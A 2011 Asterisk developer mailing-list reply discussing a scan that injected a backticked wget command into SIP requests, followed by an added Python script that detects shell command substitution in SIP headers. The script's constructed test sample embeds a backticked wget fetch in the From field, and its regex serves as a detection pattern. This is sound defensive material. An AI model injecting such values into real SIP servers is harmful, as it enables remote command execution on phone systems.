[asterisk-dev] A new kind of SIP attack ?

Tom Browning ttbrowning at gmail.com
Mon Sep 12 08:13:17 CDT 2011


On Mon, Sep 12, 2011 at 8:28 AM, Jeff LaCoursiere <jeff at sunfone.com> wrote:

> Would be interesting to let your honeypot accept the request and perform the
> wget, and see what happens next...

Well, I looked at the URL passed to the backticked wget command line
and it is a NOOP as far as I can tell.  (Using a couple of URL
vulnerability assessment tools and old-fashioned telnet direct
methods!)

I expect that the URL is strictly to populate a web server log that
will provide a convenient list of IP addresses vulnerable to the shell
injection and available for further hacking attempts.

Sadly, some perhaps widely used configuration is subject to easy shell
injection (so folks are now scanning for it).  The SIP equiv of "Bobby
Tables": http://xkcd.com/327/

Tom
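
A defensive check for the pattern discussed in this message, as an added example that is not part of the original post: it scans a SIP request's start line and headers for shell command substitution and shows the quoting to apply before any field reaches a shell. The sample messages, the addresses, the placeholder URL and the choice of the From display name as the carrying field are constructed assumptions.

```python
import re
import shlex

# Command substitution a POSIX shell would run if a SIP field were pasted
# into a command line: `...` and $(...). RFC 3261 allows the backtick in
# tokens, so a SIP parser will not reject it for you.
CMD_SUBST = re.compile(r"`[^`]*`|\$\([^)]*\)")

def parse_sip(raw):
    """Return (start_line, [(header, value), ...]) for one SIP message."""
    lines = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:   # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def find_injection(raw):
    """List (field, matched_text) for each command substitution found."""
    start_line, headers = parse_sip(raw)
    fields = [("Request-Line", start_line)] + headers
    return [(name, m.group(0)) for name, value in fields
            for m in CMD_SUBST.finditer(value)]

def as_shell_word(value):
    """Quote a field so a shell treats it as one literal argument."""
    return shlex.quote(value)

# Constructed samples (documentation addresses, placeholder URL).
CLEAN = (
    "INVITE sip:100@192.0.2.10 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 198.51.100.7:5060;branch=z9hG4bK-constructed\r\n"
    'From: "Scanner" <sip:scan@198.51.100.7>;tag=1\r\n'
    "To: <sip:100@192.0.2.10>\r\n"
    "Call-ID: constructed-1@198.51.100.7\r\n"
    "CSeq: 1 INVITE\r\n\r\n"
)
SUSPECT = CLEAN.replace("Scanner", "`wget http://example.invalid/ping`")

if __name__ == "__main__":
    for label, msg in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, find_injection(msg))
```

Passing fields to external programs as an argument list rather than through a shell command string avoids the need for quoting altogether.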
